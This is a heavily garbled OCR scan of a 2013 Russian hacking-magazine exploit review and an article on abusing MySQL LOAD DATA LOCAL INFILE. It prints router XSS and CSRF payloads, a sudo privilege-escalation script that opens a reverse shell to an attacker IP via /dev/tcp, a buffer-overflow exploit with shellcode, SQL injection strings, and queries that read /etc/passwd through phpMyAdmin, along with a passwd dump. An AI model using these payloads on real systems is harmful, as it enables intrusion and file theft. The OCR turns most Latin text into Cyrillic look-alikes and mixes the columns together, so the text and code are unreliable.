5еф РАУГОАО ]ауа/тетегрге*ег/гемегзе_{ср 

15+ ехр101* (Зауа_$5%огеТтавеАггау_Тп\уа119_Аггау_Тпаех1пй) > += 
сеф ЕНО$Т 192.168.23.70 

15+ ехр101* (Зауа_5фогеТтавеАггау_Тпуа119_Аггау_Тпаех1п#) > += 
ехр1о01+ 


У 
| 


ТАВСЕТЗ 
Чама < 7Ти?25. 


ЗОШТЮМ 


Есть исправление от производителя. 


МНОГОЧИСЛЕННЫЕ УЯЗВИМОСТИ 
В ТР-ИМК ТО-\/8951М0 


С\$$у2: М/А 

Дата релиза: 3 сентября 2013 года 
Автор: хЗепсе 

СУ\УЕ: М/А 


Продолжим тему различных уязвимостей в роутерах. Очередной жертвой ста- 
ло устройство от компании ТР-Ипк. Несколько Х$$- и одна СЗНЕ-уязвимость. 
Перейдем сразу к их эксплуатированию. 


ХАКЕР 10 /177/2013 Обзор эксплойтов 


ЕХРЕО!Т 

Первая — отраженная Х$$-уязвимость для неавторизованных пользователей 
в поле Ветегег при обращении к несуществующим УВ! -адресам на роутере. 
Пример запроса: 


СЕТ /Чоезпофех1${ НТТР/1.1 

НОЗС: 192.168.1.1 

Вефегег: Ир: //рмпеа" ><5сг1рЕ>а1ег* ("Х$5" )</зсг1ре> 
Соппес{1оп: Кеер-а11\е 


Вторая — тоже отраженная Х$$-уязвимость, но уже для авторизованных. 
Она нашлась в различных аргументах \М-Н-сети, поддерживаемой устрой- 
ством. Ниже представлены примеры для сети с именем Поте_м1ап_1: 


ВЕЕр: //<ТР>/Еогт$ /Поте_м]ап_1 ?м1 апМЕВЕ1а5=%3С$сг1рЕ%3Еа1ег{ + 
%28%22%5$5%22%29%3С / 5сг1ре%3Е 

ПЕЕр: //<ТР>/Еогт$ /Поте_м]ап_1?Ассе$$Е1а8=%3С$сг1рЕ%3Еа1ег{% = 
28%22%55%22%29%3С / $сг1ре%ЗЕ 

ПЕЕр: //<ТР>/Рогт$ /Поте_мТап_1?м]ап_АРепаб1е=%3С$сг1рЕ%3Еа1ег*+ 
%28%22%5$5%22%29%3С / 5сг1ре%3Е 


Следующая уязвимость также доступна только для авторизованных поль- 
зователей, но уже в одной из диагностических команд — рта — на странице 
/Еогт$/+001$_Те$з*_1 в аргументе Р1п=ТРАдаг. Пример запроса: 


РОЗТ /Еогт$/001$_Фе${_1 НТТР/1.1 

НОБЕ:_ < Р> 

ВеРегег: Пр: //<ТР>/та1пепапсе/%оо1$_Тез*. Пт 

АчЕПог17а*1оп: Ва$1с Б1аб1абБ1а== 

Соппес*1оп: Кеер-а11уе 

Сопфеп{-Туре: арр11са1оп/х-ммм-Фогт-иг1епсодеа 
Сопфеп{-1еп8е И: 164 

Тез _Р\/С=Р\/С0&Р1п=ТРАЧЯаг=%3С%2Е{ех{агеа%3Е%3С$сг1р{%3Еа1ег{ += 
28%22Х%55%22%29%3С%2Е5сг1р{%3Е&р1п2Йа5=1&гасе_ореп_Яаё=0&Тп+о‹= 
015$р]1ау=Р1п8+гедие{+сои1а+по+Ап49+По$ + 


Что касается СЗВАЕ-уязвимости, то она позволяет сбросить пароль адми- 
нистратора. Для атаки нужно создать НТМЁ-страницу, которая отправит сле- 
дующий запрос: 


ВЕЕр: //<ТР>/Еогт$/ф001$_а@т1п_1?и1\/1емТоо1$_Ра$$мога=« = 
РИМЕО&и1\/1емТоо1 $__РазмогАСопйгт=РИМЕО 


Чаще всего устройства этой компании имеют !Р-адрес 192.168.1.1. Далее 
злоумышленник завлекает администратора устройства на его атакующую 
страницу. После чего паролем станет слово РИМЕВ. Примеры атакующих стра- 
ниц с использованием /$ мы рассматривали в предыдущих номерах журнала. 


ТАВСЕТЗ 
Протестировано на ТР-№Шпк ТО-\/\8951МО Ритмиаге 4.0.0 Вийа 120607 
Ве!.30923. 


ЗОШТЮМ 


Ответа от производителя не поступало. 


ПОВЫШЕНИЕ ПРИВИЛЕГИЙ В 0$ Х 


С\$$у2: 6.9 (АМ:Е/АС:М/Аи:М/С:С/:С/А:С) 
Дата релиза: 29 августа 2013 года 

Автор: Магсо Эспоер!, Вама Кеппеду (Ве! 1К) 
СУ\УЕ: 2013-1775 


Утилита 5и4о содержит уязвимость, благодаря которой атакующий может ма- 
нипулировать системными часами и обходить ограничения администратора. 
Эта ошибка возникает в случае, когда батарея в системе полностью разря- 
жена или атакующий запускает команду с аргументом '-К' для сброса метки 
времени. Так как ОЗ Х является, по сути, *пх-системой, то и она использует 
зиао для выполнения системных команд. Для примера, ОЗ Х 10.8.2 исполь- 
зует версию зчао 1.7.4рб. А сам эксплойт тестировался на ОЗХ 10.7-10.8.4. 


ЕХРЕО!Т 

Для успешного срабатывания эксплойт должен запускаться с правами поль- 
зователя, который есть в списке зи4о, либо пользователя, который входит 
в группу аат1п =гочцр. Теперь рассмотрим сам эксплойт, запускающий шелл 
на порту 4444: 
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1трогЕ зибргосе$$ 

# ТР-адрес для бэк-коннекта 

традаг = "192.168,1.1` 

# Порт 

роге = "4444" 

# Открываем шелл с правами администратора через установку 
# времени 

ргос = зибргосе$$.Рореп( 'Базй', $Не11=ЕРа15е, += 
${аоч{=5ибргосе$$.РТРЕ, $41п=5ибргосе$$ .РТРЕ, «<= 
${аегг=зибргосе$$.РТРЕ) 

ргос.$5А1п .мг1Те("зузетзефир -зефи$1пепемогКкЕ1те О\Р «= 
-зе*{1тегопе СМТ -зе{дафе 01:01:1970 -зе{1те 00:00;5и40 = — 
зи\пра$зИ -1 >& /4е\у/{ср/%$/%$ 0>&1 &\п" % (1раааг, рогЕ)) 


Как видишь, мы отключаем опцию «Использовать сетевое время», чтобы 
дата не вернулась, и переводим время в «начало эпохи» УМХ — 1 января 1970 
года. Далее вызываем команду переключения пользователя на админа — зи 
через зиао и открываем порт для бэк-коннекта. 

Помимо ОЗ Х, эксплойт можно попробовать и в других ОС семейства *пх. 
Для того чтобы узнать версию зиао, достаточно ввести 


$ зи4о -у 

Такая же проверка реализуется в модуле для Мщазрой под эту уяз- 
вимость. Кстати, его и использовали при создании РУПоп-скрипта (и. 
[у/ЛеТуохВ), рассмотренного выше. 
ТАВСЕТЗ 

Зиао 1.6.0-1.7.10р6; 

биао 1.8.0-1.8.6рб. 


ЗОШТЮМ 


Есть патч как от разработчиков утилиты $иа0, так и для ОЗХ. 


УДАЛЕННОЕ ПЕРЕПОЛНЕНИЕ БУФЕРА 
В ВЕБ-СЕРВЕРЕ 1МТВАЗК\ 


С\$$у2: М/А 

Дата релиза: 30 мая 2013 года 
Автор: х5_опе 

С\УЕ: М/А 


{газгиу — небольшой консольный веб-сервер для \ММпаом/5. Ошибка возни- 
кает из-за недостаточной проверки входящих НТТР-запросов от пользовате- 
лей. Это позволяет с помощью специально созданного запроса выполнить 
произвольный код на атакуемом компьютере. 


ЕХРЕОТ 
Рассмотрим эксплойт (БИ.уанвмзн): 


еёёпипфег=" \х6б\х81 \хса\хЕ+\х@+\х42\х52\хба\х02\х58\хса\х2е\+= 
х3с\х@05\х5а\х74\хе+\хЬ8\х54\х30\х30\х57\х89\ха7\ха+\х75\хеа\+‹ = 
ха+\х75\хе7\хЕ+\хе7" + "\х90"*94 

пзей=" \хЕВ\х80\х90\х90" # Переход к еввПипфег 
5ей="\хда\х97\х40\х00" —# Вернуться на процесс 1пгазгу.ехе 
сгазй = "\х90"*1427 + ерёпипфег + пзей + зе! + "\х90"*2439 

# наш шелл-код 

°пе11со4е= ("Теоомтеем" + "\х89\хе2\хда\хс+\ха9\х72\хе4 ... 
БиТег="бЕТ / НТТР/1.1\г\п" 

БиЕРег+="Но$*: " + сгаз$й + "\г\п" 

БиРег+="Сопфеп{-Туре: арр11са{1оп/х-имм-Фогт-иг1епсодеа\г\п" 
БиРег+=зИе11соае 

опе = зоскеф.зоскее (_зоскее.АЕ_ТМЕТ, зоскеф.5ОСК_5ТВЕАМ ) 
опе.соппес* ( (тагве*, 89)) 

опе. 5епа (Би ег) 

опе.с105е() 


Как видишь, наш «полезный» код с ошибочными данными передается в па- 
раметре НТТР-запроса — По${. Помимо этого, в эксплойте применяется техника 
еда Пипипоа. Подробнее о ней можно узнать на сайте исследователя согаап (51. 
|У/17\ууци4). Такая техника используется, когда унас неболышой размер буфера. 

Также есть модуль для нашего любимого фреймворка Маёазр!ой, пример 
работы представлен на скриншоте «Пример эксплуатации уязвимости в веб- 
сервере тгазгу с помощью Мщазр!оК-модуля». 
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г бгоир 


С: \Убег$\гоо{\Вомп1оаа$ \1пгазгм> 1 


6: Озгесфогу С:\5$Вагеа 


Биссе$$Фи] Влпа1пР 


Пример запуска веб-сервера п\га$гу в МИп4о\м$ 7 


ТАВСЕТЗ 
|пгазг\ <= 1.0. 


ЗОШТЮМ 


Патча на момент написания статьи не было. 


МНОГОЧИСЛЕННЫЕ УЯЗВИМОСТИ 
В ЧЦАСК СНАТ 


С\$$у2: М/А 

Дата релиза: 15 августа 2013 года 
Автор: О\ап |171 

С\Е: М/А 


Приложение Очаск Спа{ — это чат, написанный на РНР и НТМЬЕ5 с использо- 
ванием технологии АЧУАХ. В основном он используется для удобного общения 
на сайте с помощью мобильных устройств. Как и в случае с роутером, перей- 
дем сразу к эксплуатированию веб-уязвимостей. 


ЕХРЕО!Т 

Начнем с простой Х$$-уязвимости, которая проявляется в разделе Н15+%огу. 

Ее можно проэксплуатировать двумя способами: 

1. При общении в чате в качестве параметра пате можно передать следую- 
щую конструкцию: 


><ШИв °гс=х опеггог=рготр* (/Х$5/);>> 
После чего она отобразится на странице 1оса1По$*/ас_адт1п/1паех. 
рир?р=В1$Фогу. 

2. Обратиться к определенной странице лога общения в чате: 


]1оса1Но$* /дс_адт1п/1паех.рИр?р=И1$огу&раве=2+(Х$5 \Месфог) 


Например: 


Адтт: То Зап уочцг дето, дгаб уочцг рпопе ог{аЫе{ апа до {о 


Очцаск Спа собственной персоной 


ХАКЕР 10 /177/2013 


Пример эксплуатации уязвимости в веб-сервере шугазгу спомощью 
Меазрой-модуля 


]1оса1Но$*/ас_адт1п/1падех.рИр?р=И1$огу&раве=2%22%22%3ЕЖЗ С++ 
118%205$гс=х%20опеггог=рготрт%28/Х$5/%29 ;%3ЕЖЗЕ 

Следующая 5О!-уязвимость содержится в том же разделе: 
|осайо$Иас_аатт/таех.рпр?р=тюгу&а=(ЗО шесйоп) 
осайо$ИУас_аатт/таех.рпр?р=т$юогу&раде=(З О шесйоп) 


Пример использования: 


ПЕЕр : //51%е. сот/ас_аат1п/1паех .рир?р=И1$%огу&19=1+апа++«= 
$1еер(190) 


И последняя на сегодня — раскрытие путей. Если в качестве $©01- 
уязвимости в прошлом запросе передать символ ', то получим: 


]1оса1Ио5*/ас_а@т1п/1паех .рИр?р=И1$огу&1а=' 
1п /маг/имм/ спа /ас_а9т1п/1пдех.рИр оп 11пе 249 


ТАВСЕТЗ 
Очаск Спа <= 1.0. 


ЗОШТЮМ 


Патча на данный момент не существует. Кстати, этот же чат используется 
в деморежиме на официальном сайте :). 


УДАЛЕННЫЙ ОТКАЗ ОТ ОБСЛУЖИВАНИЯ 
ВВИМО 


С\$$у2: 7.8 (АМ:М/АС:/Ач:М/С:М/:М/А:С) 
Дата релиза: 30 июля 2013 года 

Автор: неизвестен, Махит Эпиагак 

СУ\Е: 2013-4854 


И напоследок уязвимость нулевого дня. Она была обнаружена после успеш- 
ных атак в июле 2013-го на ОМ$-серверы, использующие ВМО. Сам ВМО яв- 
ляется открытой и наиболее распространенной реализацией ОМ$-сервера, 
более того, на 10 из 13 корневых ОМ$-серверах используется именно он. 
Для того чтобы вызвать падение сервера, достаточно было отправить специ- 
ально сформированный запрос с некорректно заполненной НРПАТА-секцией, 
которая неправильно обрабатывалась при составлении 0ю9-сообщения. 


ЕХРЕОТ 
Эксплойта пока нет в публичном доступе, но, как было сказано выше, он ак- 
тивно использовался темной стороной. 


ТАРСЕТЗ 
15С ВМО 9.7.0а1-9.9.3ВСТЛ; 
15С Оп$со Впа 9.9.3$1-9.9.4$1Ь1. 


ЗОШТЮМ 
Есть обновление от производителя. 2= 
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Описываю довольно частую ситуацию. Во время пентеста получен доступ 

к рирМуАати на удаленном хосте, но добраться через него до файлов не полу- 
чается. Во всем виноват пресловутый флаг НЕЕ _РНМ\=по в настройках демона 
МузОЕ. Многие в этой ситуации сдаются и считают, что файлы на хосте таким 
образом уже не прочитать. Но это не всегда так. 


ХАКЕР 10 /177/2013 


хи 


Алексей Москвин 
РозИме Тесйпо!од!е$ 
атозкуп@р{есигКу.ги 


ХАКЕР 10 /177/ 2013 [ГОАО БРАТА, или 


ПРЕЛЮДИЯ 
Когда речь идет о взаимодействии СУБД МУЗСЕ с файловой си- 
стемой, то вспоминают, как правило: 
функцию ГОАБВ_ЕИЕ, позволяющую читать файлы на серве- 
ре, 
конструкцию ЗЕТЕСТ ... ИМТО ОЧТЕШЕ, с помощью которой 
можно создавать новые файлы. 


Соответственно, если получен доступ к рирМуАатт или 
любому другому клиенту на удаленной машине, то с большой 
вероятностью через МузОЕ можно добраться до файловой 
системы. Но только при условии, что в настройках демона 
установлен флаг ЕЕЕ_РЕАМ№=уе$, что бывает далеко не всегда. 
В этом случае надо вспомнить про другой оператор, куда ме- 
нее известный, но при этом обладающий довольно мощным 
функционалом. Я говорю об операторе ГОАО РАТА 1МЕШЕ, 
об особенностях которого и будет рассказано в этой статье. 


СИНТАКСИС ТОАО ОАТА 

Оператор ГОАВ РАТА, как гласит документация, читает строки 
из файла и загружает их в таблицу на очень высокой скорости. 
Его можно использовать с ключевым словом ЕОСАЕ (доступно 
в МУуЗОЕ 3.22.6 и более поздних версиях), которое указывает, 
откуда будут загружаться данные. Если слово (ОСАЕ отсутству- 
ет, то сервер загружает в таблицу указанный файл со своей ло- 
кальной машины, а не с машины клиента. То есть файл будет 
читаться не клиентом МуЗСЕ, а сервером МуЗСЕ. Но для этой 
операции опять же необходима привилегия ЕЁЕ (флаг ЕЁЕ_ 
РВА\№=уе$). Выполнение оператора в этом случае можно срав- 
нить с использованием функции ГОАБ_ЕШЕ — с той лишь раз- 
ницей, что данные загружаются в таблицу, а не выводятся. 
Таким образом использовать (ОАВ ВАТА1МЕШЕ для чтения фай- 
лов имеет смысл только тогда, когда функция ГОАОБ_НЕЕ недо- 
ступна, то есть на очень старых версиях МузО!-сервера. 

Но если оператор используется в таком виде: ГОАБ БАТА 
ГОСАЁЕ ТМЕТЕЕ, то есть с использованием слова (ОСА! то файл 
читается уже клиентской программой (на машине клиен- 
та) и отправляется на сервер, где находится база данных. 
При этом для доступа к файлам привилегия ЕШЕ, естественно, 
не нужна (так как все происходит на машине клиента). 


ЧТЕНИЕ ФАЙЛОВ 

Внимательный читатель, наверное, уже догадался, что если 
у нас есть аккаунт в рирМуАдтт, то мы сможем читать про- 
извольные файлы, не имея привилегию ЕИШЕ, и даже обходить 
ограничения ореп_разеат. Ведь очень часто и клиент (в данном 
случае рирМуАатт), и демон МуЗОЕ находятся на одной и той 
же машине. Несмотря на ограничения политики безопасности 


ВЗАИМОДЕЙСТВИЕ РНР И МУЗ ОЕ 


РНР — самый распространенный язык для создания веб- 
приложений, поэтому стоит рассмотреть подробней, каким 
образом он взаимодействует с базой данных. 

В РНРА4 клиентские библиотеки МУЗОЕ были включены 
по умолчанию и входили в поставку РНР, поэтому при уста- 
новке можно было только отказаться от использования 
МуЗСЕ, указав опцию --мИПоцщ-туза1. 

РНР5 поставляется без клиентской библиотеки. 

На *пх-системах обычно собирают РНР5 с уже установлен- 
ной на сервере библиотекой ИБтузасИегтф, просто задав 
опцию --мИй-туза=/изг при сборке. При этом до версии 
5.3 для взаимодействия с сервером МуЗСОЕ используется 
низкоуровневая библиотека Му5ОЕ Сйеп{ ИБгагу (Поту$а|), 
интерфейс которой не оптимизирован для коммуникации 
с РНР-приложениями. 

Для версии РНР 5.3 и выше был разработан МуЗОЕ 
Мануе Опуег (тузашпа), причем в недавно появившейся вер- 
сии РНР 5.4 этот драйвер используется по умолчанию. Хотя 
встроенный драйвер МузЗСЕ написан как расширение РНР, 
важно понимать, что он не предоставляет программисту 
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13.2.6. ТОАР РАТА ТМЕТЬЕ Зупах 


ГОАО РАТА [ГОМ РЕТОВТТУ | СОМСОВВЕМТ] 
[ВЕРГАСЕ | ТСМОВЕ] 
ТМТО ТАВГЕ ЁЕЪТ ваше 
[СНАКАСТЕВ 5ЕТ сВагзеЁ паше] 
[{ЕТЕЬО$ | СОБОММ5} 
[ТЕКМТМАТЕО ВУ ' зёг2та"' ] 
[[ОРТТОМАЬГУ] ЕМСГО$ЕО ВУ ' сваг' ] 
[Е5САРЕО ВУ ' сваг' ] 
] 
[ЬТМЕ$ 
[5ТАВТТМС ВУ ' 51а" ] 
[ТЕКМТМАТЕО ВУ ' зёг2та"' ] 
] 
[ТСМОВЕ пишЬег ГТМЕЗ] 
[(со1 ваше ог изег учаг,...)] 
ана 


[БЕТ со! паше = 


[ГОСАЁ] ТМЕТЬЕ 'ЕЁ11е паше' 


Синтаксис оператора 
ОАО БАТАП1МЕШЕ 


сервера Му5О(, мы можем воспользоваться тем, что для кли- 
ента эта политика не действует, и все-таки прочитать файлы 
из системы, запихнув их в базу данных. 
Алгоритм простой. Достаточно выполнить следующие $01- 
запросы: 
1. Создаем таблицу, в которую будем записывать содержимое 
файлов: 


СКЕАТЕ ТАВЕЕ етр(соп%еп{ *ехт); 
2. Отправляем содержимое файла в созданную таблицу: 


[ОАО ОАТА ГОСАЁЕ ТМЕТЕЕ '/ефс/По$ф$"' ТМТО ТАВЬЕ += 
фетр ЕТЕЁГО$ ТЕВМТМАТЕО ВУ '__ео+__' ЕЗСАРЕО = — 
ВУ '' ТТМЕЗ$ ТЕВМТМАТЕО ВУ "_ео+__'; 

Вуаля. Содержимое файла /ес/по${$ теперь в таблице 
{етр. Нужно прочитать бинарные файлы? Нет проблем. Если 
на первом шаге мы создадим такую таблицу: 


СКЕАТЕ ТАВЕЕ '61п' ("61п' ВЕОВ МОТ МОЕ ) == 


ЕМСТМЕ = МУТФАМ ; 


РНР нового АР!. АР! к базе данных МузОЕ для программиста 
предоставляют расширения МуЗСЕ, тузайи РОО_МУЗОЕ. 
Эти расширения могут использовать возможности встроен- 
ного драйвера МуЗОЕ для общения с демоном МуЗОЕ. 

Использование встроенного драйвера МуЗОЕ дает неко- 
торые плюсы относительно клиентской библиотеки МуЗСОГ: 
кпримеру, не требуется устанавливать МуЗСЕ, чтобы со- 
бирать РНР или использовать работающие с базой данных 
скрипты. Более подробную информацию о МУЗОЕ Маме 
Оиуег и его отличиях от Иотуза! можно найти в документа- 
ции ( й 

Расширения МУЗОЕ, тузай и РВО_МУЗСЕ могут быть 
индивидуально сконфигурированы для использования 
либо Потуза[, либо тузата. Например, чтобы настроить 
расширение МуЗСЕ для использования МузОЕ Сет Ибгагу, 
а расширения тузай для работы с МУЗОЕ Ман\е Оп\уег, не- 
обходимо указать следующие опции: 


сопйвиге --м1И-ту$а1=/ч5г/61п/ту$а1_сопйЯ ‹_ 
АИ ту $ а = ту ап 


У\АВММС 


Вся информация предо- 
ставлена исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут от- 
ветственности за любой 
возможный вред, при- 
чиненный материалами 
данной статьи. 
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1ех{ 

гоо{:х:0:0:гоо{:/гоо{:Лып/ба$п 
даетоп:х:1:1:даетоп:/и$/5Ып-/Ьп/$В 
Ып:х:2:2:Ып:/Лып:/Ып/$И 
5у$:х:3:3:5у$:/Аеу:/уп/5П 
5упс:х:4:65534:5упс:/ып:/ып/зупс 
датез:х:5:60:датез:/из/датез:/Бп/$В 
тап:х:6:12:тап:/Аа/саспе/тап:/5п/5 В 
[р:х:7:7:1р:/уа/зрооМра:/ып/$ В 
па!:х:6:6:ттай:/иа/тай:/Ып/$ В 
пем/5-х:9:9-пем/5 -/ма/зроо/пеми/ -/Бп/$П 
циср:х:10:10:циср:Ла/зрооМииср:/Ып/$П 
ргоху:х:13:13:ргоху:Лып:Луп/$В 
млмм-да{а:х:33:33:мллмм-даа:/уаг/\ммим:ЛБип/5 И 
БасКир:х:34:34:БаскКир:/ма/БасКирз:/Бп/$В 
|15{:х:38:38:Майпд 11${ Мападег:Лаг/!${:/Ып/®... 


Содержимое файла /ейс/ра$$м/А в таблице{е$1 


то в нее возможно будет загружать и бинарные файлы. Правда, 
в конец файлов будут добавляться лишние биты, но их можно 
будет убрать в любом Пех-редакторе. Таким образом мож- 
но скачать с сервера скрипты, защищенные |опСибе/Гепа/ 
ТгиеСгур/Ми$рпеге, и раскодировать их. 

Другой пример, как можно использовать ГОАВ ВРАТА ОСАЁЕ 
|1МЕШЕ, — узнать путь до конфига Араспе’а. Делается это сле- 
дующим образом: 

1. Сначала узнаем путь до бинарника, для этого описанным 
выше способом читаем /ргос/зе/ста!те. 
2. И далее читаем непосредственно бинарник, где ищем 

НТТРО_ВООТ/ЗЕРУЕВА_СОМЕС_РЕЩЕ. 


Также можно попробовать прочитать файлы таблиц МуЗСЕ, 
если права на эти файлы позволяют сделать это (обычное 
дело на виндовых серверах). 

Ясно, что в данной ситуации скрипты рирМуАатт игра- 
ют роль клиента для соединения с базой данных. И вме- 
сто рирМуАдтт можно использовать любой другой веб- 
интерфейс для работы с Муз ОЕ. 

К примеру, можно использовать скрипты для бэкапа и вос- 
становления базы. Еще в 2007 году французский хакер под ни- 
ком асгоо{ выложил в паблик эксплойт, основанный на этом 
замечании и дающий возможность читать файлы из админ-па- 
нели рирВВ <= 2.0.22. 


ТУННЕЛЬ — УДОБНО. ТУННЕЛЬ — НЕБЕЗОПАСНО 

При установке сложных веб-приложений зачастую требует- 
ся прямой доступ в базу, например для начальной настройки 
и корректировки работы скриптов. Поэтому в некоторых случа- 
ях целесообразно установить на сервере простой скрипт — так 
называемый МУЗОЕ Типпе|, позволяющий выполнять запросы 


[7] Сервер: рирМуАдпит дето - МуЗОЁ 
д] $4 


Базы данных № Состояние а= Пользователи 


Выполнить 51 -запрос(ы) на сервере "рирМуАдтт дето - Муз" 


О ВРАТА ГОСАТ ТМЕТЬЕ '/есс/раззиа' 


= тезт; 


Помещаем содержимое файла /е{с/ра$$\ма в таблицу{е$1 


%= Экспорт 


. ® 


ХАКЕР 10 /177/2013 


РАСШИРЕНИЯ МУЗЕГ/МУЗ@Н/РОО_МУЗОЕ 
И ОПЕРАТОР 10АО БАТА ГОСАЕ 


В расширении МузОЕ возможность использовать ГОСАЕ регулируется РНР_1М!_ 
ЗУЗТЕМ директивой туза|.аЙом/ оса! пйе. По умолчанию эта директива имеет 
значение 1, и поэтому нужный нам оператор обычно доступен. Также функция 
туза! соппес{ позволяет включать возможность использования [ОАВ БРАТА 
ГОСАЕ, если в пятом аргументе стоит константа 128. 


Когда для соединения с базой данных используется расширение РОО _ 
МУЗСЕ, то мы также можем включить поддержку ГОСАЕ, используя константу 
РОО::МУЗОЕ._АТТВ_ГОСАЕМЕЕЕ (птедег) 


$рао = пем РОО('ту$41 :по$+=1оса1Ио$* ; Абпате=туа6', ‘'изег', 
'раз5', аггау (РОО: : МУ$ОЕ_АТТК_ЕОСАЕ_ТМЕТЬЕЕ => 1)); 

Но самые большие возможности для работы с оператором ГОАВ ВАТА 
предоставляет расширение тузай. В этом расширении тоже предусмотрена 
РНР_1М! ЗУЗТЕМ директива ту$411.а11ом_1оса1_1пЯ1е, регулирующая исполь- 
зование ОСАЕ. 

Если соединение осуществляется посредством тузай геа! соппесф, то 
с помощью тузай_орйоп$ мы можем как включить, так и выключить поддержку 
ГОСАЕ. Более того, в этом расширении доступна функция тузай_5ет оса! ше_ 
папаГег, которая позволяет зарегистрировать са!Баск-функцию для обработки 
содержимого файлов, читаемых оператором ГОАВ БРАТА ГОСАЕ1МЕЕЕ. 


к базе данных с помощью удобного клиента вместо тяжеловес- 
ного рирМуАатт. 

Туннелей для работы с базой данных довольно много, 
но все они не очень сильно распространены. Пожалуй, один 
из самых известных — это Масготе а Огеат \М/еауег Зегуег 
5сйр{$. Посмотреть исходники этого скрипта можно тут: БИ. 
[у/15Ма!СЗ. 

Основное отличие МузЗОЕ Типпе! от рирМуАатт — это не- 
обходимость вводить не только логин и пароль от базы данных, 
но и хост, с которым нужно соединиться. При этом туннели ча- 
сто оставляют активными, ну просто на всякий случай, мало ли 
что еще нужно будет поднастроить. Вроде как воспользовать- 
ся ими можно, только если есть аккаунт в базу данных, — тог- 
да чего бояться? Короче, создается впечатление, что туннель 
особой угрозы безопасности веб-серверу не несет. Но на са- 
мом деле не все так хорошо, как кажется на первый взгляд. 

Рассмотрим следующую ситуацию. Пусть на сервере А 
есть сайт зве.сот с установленным туннелем ПИр://5Це.соти/_ 
мизегмуег$сир1$/ММНТТРЬОВ.рйр. Предположим, что на сер- 
вере А есть возможность использовать ГОАБ ВАТА ОСАЕ (как 
обсуждалось выше, это, например, возможно при дефолт- 
ных настройках). В этом случае мы можем взять удаленный 
МузО!-сервер, в базы которого пускают отовсюду и который 
тоже позволяет использовать ГОСА|, и соединиться с этим 
сервером с помощью туннеля. Данные для коннекта с удален- 
ным МузОЕ-сервером: 


ОВ Но$*: хх.хх.хх.ххх 
ОВ Маме: патме_гето*е_аБ 
ОВ У5ег: оичг_изег 

ОВ Ра$$: оиг_ра$$ 


В данной ситуации сервер А будет играть роль клиента, 
и поэтому мы можем отправлять файлы с его хоста в удален- 


«/ Добавлена 31 строка. (Запрос занял 0.0253 сек.) 


ГОАО БАТА ГОСАЕ ТМЕШЕ '/ес/ра$5\и/а' ТМТО ТАВЕЕ {е$( 


Запрос выполнен удачно 


ХАКЕР 10 /177/ 2013 [ОАР ВАТА, или прочитать любой ценой (9 9 


| Муза! #е_рйм = по чтение файлов. НЫ:  БЕЕББ ЕЕ ЗУБЫ Оо БЫ ЬЫ 
Вобщем-то мне стыдно, но истина дороже, поэтому публикую. (@ а а о 


Состоялся у меня разговор с товарищем РгОхог"м на отвлечённую тему, в котором м1 
без привелегий ЕЕ. Я в это дело не поверил и попросил продемонстрировать, на чт 
не стал, а полез в маны, и вот что там увидел: (У 6 ИРУ У У», у 629 го ЛР Его ГРЮРЗРОЮОЯ 
НЕЕр://мимим.луза!.ги/4ос$/тап/-ОАО_РАТА. НЕ! й 6% | И | 7 т УИ 5-9 (У = 5-Я \ = | а У 5@ | , 


Команда ГОАО РАТА 1МЕЦЕ читает строки из текстового файла и вставля 
ключевое слово ГОСА(, то файл читается с клиентского хоста, Если же Ц 
Регистрация: 01.07.2010 сервере. (Опция ГОСАЕ доступна в версии Му5ОЕ 3.22.6 и более поздни) 
Репутация: 150 о Е р , 
либо размещаться в директории базы данных, либо быть доступными дл _  нашабд', ‘юзер’, ‘пасс’, аггау (РОО: : += 
ВНЕ ИЕ Е ЬНН Я МУЗОЕ _АТТВ_ГОСАЕ_ТМЕТЕЕ => 1)); 
фе=$рао- >ехес ("ГОАО ОАТА 1ОСАЁЕ ТМЕТЁЕЕ './раев+= 
Обсуждениетемы в кулуарах Вао+{.ог9 /Хо/А1е' ТМТО ТАВЕЕ %е5+ ЕТЕЁО$ ТЕКМТМАТЕО += 
ВУ '_ео+__' ЕЗСАРЕО ВУ '' 1ТМЕЗ ТЕВМТМАТЕО «= 
ВУ '_ еоф__"'"); 
ную базу или, другими словами, читать файлы. Следующим фрао = пи11; 
нехитрым запросом: 2> 
Туре=МУ$ОЕ&Т1теоч{=100&Ноз*=хх.хх.хх.ххх&Оафабазе=« МУТИТИУ можно попытаться прочитать файлы, обходя ограничение ореп_ 
пате_гетофе_96&И5егМате=оиг_изег&Ра$мога=очг_ра$$8+= базед!. Полезный хинт. 
орСод4е=Ехеси*е5018&$01=10АО БАТА ЕОСАЁЕ ТМЕТЕЬЕЕ «= Топик по Муза! Ше_рим = 
{ран /Фо/$сг1ре/ зефир _ор*1оп$.рИйр' ТМТО ТАВЕЕ «= по: БИ. 1у/14у\М Юго ЗАКЛЮЧЕНИЕ 
Етр_+61 РТЕЁО$ ТЕКМТМАТЕО ВУ '_ео+__" ЕЗСАРЕО ‹= Любопытно, что описанная возможность оператора ГОАРВ БВАТА 
ВУ '" 1ТМЕ$ ТЕКМТМАТЕО ВУ '_ео+__' ГОАВ ВАТА 1МЕЕЕ известна не меньше десяти лет. Упоминание о ней можно, на- 
бутах: БЦУ/АСхНх пример, найти в тикете [#15408] (За!е Моче / МУЗСЕ \Мит 2002- 
На самом деле эта уязвимость более опасна, чем обычное 02-06), и потом похожие вопросы неоднократно всплывали 
чтение файлов: ведь она позволяет прочитать конфигурацион- Соппесйпа 10 МузОЕ на Бид$.рйр.пе [#21356], [#23779], [#28632], [#312611], [#31711]. 
ные файлы скриптов, установленных на сервере А. Через этот зегуег: БК./у/Ле9 апр На что разработчики отвечали дословно следующее: 
же туннель можно получить уже прямой доступ к базе, кото- 
рая управляется этими скриптами. Описанную выше технику \МПа{ 1$ пеми ш РНР [2003-04-24 04:16 УТС] веогв@рир.пе*е 
по использованию мускульных туннелей можно немного обоб- 5.3 — рам 3: тузата: ТЕ 5 поф а Бий, 1&’5 а Феабиге :) 
щить и применить при эксплуатации ипзепайхе-уязвимостей. ОК. у/БКбАхР 
р Или присваивали тикету Зайти :\М\Моптт Ях. Или ограничива- 
ОБХОД ОГРАНИЧЕНИИ ОРЕМ ВАЗЕО!В рирВВ <= 2.0.22 лись патчами, которые почти ничего не решали. Тикеты на эту 
Использование [ГОАО РАТА довольно часто позволяет обходить Ветое Баабазе тему возникали вновь. Поэтому указанный способ обхода 
ограничения ореп_рБазеа!. Это может оказаться полезным, если, Ащпепйсайоп О&а!$ ореп_Базеа! и до сих пор работает на довольно большом ко- 
например, мы имеем доступ в директорию одного пользователя РОС: БК./У/1Ау\Мт С личестве серверов. Впрочем, с появлением нового драйвера 
